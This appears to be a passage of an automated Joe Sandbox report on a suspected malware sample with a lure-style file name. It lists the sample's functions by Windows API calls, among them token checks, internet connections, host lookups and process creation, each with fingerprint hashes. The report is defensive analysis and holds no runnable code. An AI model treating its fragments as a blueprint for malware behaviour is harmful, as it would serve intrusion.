                                                          • Part of subcall function 00A78652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A78669
                                                          • Part of subcall function 00A78652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A78673
                                                          • Part of subcall function 00A78652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A78682
                                                          • Part of subcall function 00A78652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A78689
                                                          • Part of subcall function 00A78652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A7869F
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00A78BEB
                                                        • _memcmp.LIBCMT ref: 00A78C0E
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A78C44
                                                        • HeapFree.KERNEL32(00000000), ref: 00A78C4B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                        • String ID:
                                                        • API String ID: 1592001646-0
                                                        • Opcode ID: 0c232d006c474b2c8746bfdb467089f05df87b818b6ce853964ec82181c7d52a
                                                        • Instruction ID: 0873e13f9d2bd3210aeda6c5c53cfe3a907df408e2853c16b8f5e8d603816e54
                                                        • Opcode Fuzzy Hash: 0c232d006c474b2c8746bfdb467089f05df87b818b6ce853964ec82181c7d52a
                                                        • Instruction Fuzzy Hash: CD218D71E41209EFCB14CF94CD49BAEB7B8EF40350F15C059E558A7240DB38AA06CB61
                                                        Function 00A40BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __setmode.LIBCMT ref: 00A40BF2
                                                          • Part of subcall function 00A25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A87B20,?,?,00000000), ref: 00A25B8C
                                                          • Part of subcall function 00A25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A87B20,?,?,00000000,?,?), ref: 00A25BB0
                                                        • _fprintf.LIBCMT ref: 00A40C29
                                                        • OutputDebugStringW.KERNEL32(?), ref: 00A76331
                                                          • Part of subcall function 00A44CDA: _flsall.LIBCMT ref: 00A44CF3
                                                        • __setmode.LIBCMT ref: 00A40C5E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                        • String ID:
                                                        • API String ID: 521402451-0
                                                        • Opcode ID: 6771d0a7a2248b33cad8c2f507e691c728b87ac4119c10529a7f322b0b04e2ef
                                                        • Instruction ID: 2afefd5685e6ad916b515425acbec90d77d4f17e476101406b5d8409b533b19d
                                                        • Opcode Fuzzy Hash: 6771d0a7a2248b33cad8c2f507e691c728b87ac4119c10529a7f322b0b04e2ef
                                                        • Instruction Fuzzy Hash: FE113A36904214BEDB04B3B8AD83EBE7B699F89320F14412AF204571D2DF315D869395
                                                        Function 00A91A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A91A97
                                                          • Part of subcall function 00A91B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A91B40
                                                          • Part of subcall function 00A91B21: InternetCloseHandle.WININET(00000000), ref: 00A91BDD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 1463438336-0
                                                        • Opcode ID: 608c3b435cbcd72eff9a2e895407cb3041cc023e56f4c29de66a7f5326d1521f
                                                        • Instruction ID: 3093bfb9174ef5c1f267c714dd821f7abf25fa69bdad71afe3ee75ca6bc1e3ad
                                                        • Opcode Fuzzy Hash: 608c3b435cbcd72eff9a2e895407cb3041cc023e56f4c29de66a7f5326d1521f
                                                        • Instruction Fuzzy Hash: 71216F35300606BFEF169FA08C41FBAB7EEFF45701F10441AFA5696691EB7198119BA0
                                                        Function 00A7E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A7F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00A7E1C4,?,?,?,00A7EFB7,00000000,000000EF,00000119,?,?), ref: 00A7F5BC
                                                          • Part of subcall function 00A7F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00A7F5E2
                                                          • Part of subcall function 00A7F5AD: lstrcmpiW.KERNEL32(00000000,?,00A7E1C4,?,?,?,00A7EFB7,00000000,000000EF,00000119,?,?), ref: 00A7F613
                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00A7EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00A7E1DD
                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00A7E203
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00A7EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00A7E237
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        • Opcode ID: 487d8bf93a1803e0843bb1579030a8df5d45c90a4a39501d7fcd38d05882b04e
                                                        • Instruction ID: 9dd31710e5325b36de24e2de9dc96ba163336e03270fa85d40b3b40c6084ccb3
                                                        • Opcode Fuzzy Hash: 487d8bf93a1803e0843bb1579030a8df5d45c90a4a39501d7fcd38d05882b04e
                                                        • Instruction Fuzzy Hash: 0311A23A100201EFCF25EF64DC459BA77A8FF89350B40C16AE90ACB290EB7199519790
                                                        Function 00A55332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00A55351
                                                          • Part of subcall function 00A4594C: __FF_MSGBANNER.LIBCMT ref: 00A45963
                                                          • Part of subcall function 00A4594C: __NMSG_WRITE.LIBCMT ref: 00A4596A
                                                          • Part of subcall function 00A4594C: RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000000,?,?,?,00A41013,?), ref: 00A4598F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: 5035c9f64506fd88a58254fe4298b2a951acbc43f290cefda81ca49366459c73
                                                        • Instruction ID: b3c5dbeff20724863014507c722361b7d4da3fdc0e15f3027252ced2bcd32778
                                                        • Opcode Fuzzy Hash: 5035c9f64506fd88a58254fe4298b2a951acbc43f290cefda81ca49366459c73
                                                        • Instruction Fuzzy Hash: 23110132C05A05AFCF202FB0E97565D3BA8BF513F2B20042AFD09AE091DB74C9459790
                                                        Function 00A24531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A24560
                                                          • Part of subcall function 00A2410D: _memset.LIBCMT ref: 00A2418D
                                                          • Part of subcall function 00A2410D: _wcscpy.LIBCMT ref: 00A241E1
                                                          • Part of subcall function 00A2410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A241F1
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00A245B5
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A245C4
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A5D6CE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                        • String ID:
                                                        • API String ID: 1378193009-0
                                                        • Opcode ID: 0d8b4c6a363461b49fb2125b0622c9dc9ac5c68ab58611814d242271175463b5
                                                        • Instruction ID: 8205fdab8b9ecaebbe360b95f0bb98de5401c2eba3db0a7c8c467785ac322b9a
                                                        • Opcode Fuzzy Hash: 0d8b4c6a363461b49fb2125b0622c9dc9ac5c68ab58611814d242271175463b5
                                                        • Instruction Fuzzy Hash: 5D210770904794AFEB32CB64DC45BE7BBECAF05309F04009DE6DE56281C7B45E898B51
                                                        Function 00A9667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A87B20,?,?,00000000), ref: 00A25B8C
                                                          • Part of subcall function 00A25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A87B20,?,?,00000000,?,?), ref: 00A25BB0
                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00A966AC
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A966B7
                                                        • _memmove.LIBCMT ref: 00A966E4
                                                        • inet_ntoa.WSOCK32(?), ref: 00A966EF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 1504782959-0
                                                        • Opcode ID: 1d20ebdd1d635f02a49d294fd047a6954372c5f65a2393391440cf85c07ad554
                                                        • Instruction ID: 9b16fae4392c3b54c03f40cea3aff876f0632264fc34a46d73ade3fefc76d5bf
                                                        • Opcode Fuzzy Hash: 1d20ebdd1d635f02a49d294fd047a6954372c5f65a2393391440cf85c07ad554
                                                        • Instruction Fuzzy Hash: 2A111F35900515AFCF04EBE4EE96DEEB7B8BF49710B144065F506A71A1DF309E04CB61
                                                        Function 00A79023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A79043
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A79055
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A7906B
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A79086
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: c56abf6b9d66bc60a90a3b5129ecb31ed30ef27a32557be7cd909216060782c1
                                                        • Instruction ID: 523f4ed1b2f9678475b24ef08fd9795784c7219359c5d1d8f90bb6c7532e6394
                                                        • Opcode Fuzzy Hash: c56abf6b9d66bc60a90a3b5129ecb31ed30ef27a32557be7cd909216060782c1
                                                        • Instruction Fuzzy Hash: FA115E79900218FFDB10DFA5CD85EAEBB78FB48310F208096E904B7290D7716E11DB90
                                                        Function 00A21290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 00A212D8
                                                        • GetClientRect.USER32(?,?), ref: 00A5B84B
                                                        • GetCursorPos.USER32(?), ref: 00A5B855
                                                        • ScreenToClient.USER32(?,?), ref: 00A5B860
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 4127811313-0
                                                        • Opcode ID: 6fe98d252b789781db594689606d793ee07024df3d1d3d65faa188a85b25570b
                                                        • Instruction ID: d6104558ecd2ff6adfd47e178be8b8aea68c3230b7fcb04aac51f8c9a92a2151
                                                        • Opcode Fuzzy Hash: 6fe98d252b789781db594689606d793ee07024df3d1d3d65faa188a85b25570b
                                                        • Instruction Fuzzy Hash: FE113A3590006AEFCB14DFA8E9859FE77B8FB16301F100475F901E7251C730BA528BA5
                                                        Function 00A81652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A801FD,?,00A81250,?,00008000), ref: 00A8166F
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00A801FD,?,00A81250,?,00008000), ref: 00A81694
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A801FD,?,00A81250,?,00008000), ref: 00A8169E
                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00A801FD,?,00A81250,?,00008000), ref: 00A816D1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        • Opcode ID: 341af9334c1fd8ac495918dc3b4d9afbda589c5a0d97822e9fce6e4f6128c84d
                                                        • Instruction ID: 217f5650b1b95b340b3bfef03291cad50310b8c43dbfea4d128afe598c5137a6
                                                        • Opcode Fuzzy Hash: 341af9334c1fd8ac495918dc3b4d9afbda589c5a0d97822e9fce6e4f6128c84d
                                                        • Instruction Fuzzy Hash: FF11AC31C0051DDBCF00EFE5D848AEEBF38FF09311F044565EA84B2280EB3155628B96
                                                        Function 00A57207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction ID: ebc5eca0404a7d63b6e99d7f626b2b929379469f316e82d689c95ca9c9c28819
                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction Fuzzy Hash: 5C017B7204814ABBCF125F84EC018EE3F22BF29342F088615FE1868031C236C9B9AB81
                                                        Function 00AAB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00AAB59E
                                                        • ScreenToClient.USER32(?,?), ref: 00AAB5B6
                                                        • ScreenToClient.USER32(?,?), ref: 00AAB5DA
                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AAB5F5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                        • String ID:
                                                        • API String ID: 357397906-0
                                                        • Opcode ID: b9f9b31794effe07c523244347442113476f292adcfcd15a62f829d9e0ed82f9
                                                        • Instruction ID: 70dce2d5a2cc9a607e3d2036073e6fe628a1d042eb9776f7d7dd7c8f64fbeaeb
                                                        • Opcode Fuzzy Hash: b9f9b31794effe07c523244347442113476f292adcfcd15a62f829d9e0ed82f9
                                                        • Instruction Fuzzy Hash: 2E1146B5D0024AEFDB41CFE9C4849EEFBB5FB09310F104166E915E3260D735AA558F90
                                                        Function 00AAB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00AAB8FE
                                                        • _memset.LIBCMT ref: 00AAB90D
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00AE7F20,00AE7F64), ref: 00AAB93C
                                                        • CloseHandle.KERNEL32 ref: 00AAB94E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3277943733-0
                                                        • Opcode ID: 87f5631077df5e4ecb04cc7c53a8fe62723b7156881c2bad5cfad50d59dce780
                                                        • Instruction ID: fa3e6d699b6d7c353c4c154076761d245961a761f403e3709fe1c9a139a79acc
                                                        • Opcode Fuzzy Hash: 87f5631077df5e4ecb04cc7c53a8fe62723b7156881c2bad5cfad50d59dce780
                                                        • Instruction Fuzzy Hash: D0F05EB25443907FEB10A7E5AC45FBF3A5CEB09354F004024BA08DA192D7714D02C7B8
                                                        Function 00A86E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00A86E88
                                                          • Part of subcall function 00A8794E: _memset.LIBCMT ref: 00A87983
                                                        • _memmove.LIBCMT ref: 00A86EAB
                                                        • _memset.LIBCMT ref: 00A86EB8
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00A86EC8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                        • String ID:
                                                        • API String ID: 48991266-0
                                                        • Opcode ID: 0f2a7ce4a55bbe8f3d18d9b4ef93663f214098e7fac7673b8342e0687e6be4e7
                                                        • Instruction ID: ae071335569c50eefd90476215e52b8e483abc4cf7205b8cc07438333a8f2cdf
                                                        • Opcode Fuzzy Hash: 0f2a7ce4a55bbe8f3d18d9b4ef93663f214098e7fac7673b8342e0687e6be4e7
                                                        • Instruction Fuzzy Hash: 87F0543A100210ABCF416F95DD85B89FB29EF85320B04C061FE085F266C731E951CBB4
                                                        Function 00AAC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A212F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A2134D
                                                          • Part of subcall function 00A212F3: SelectObject.GDI32(?,00000000), ref: 00A2135C
                                                          • Part of subcall function 00A212F3: BeginPath.GDI32(?), ref: 00A21373
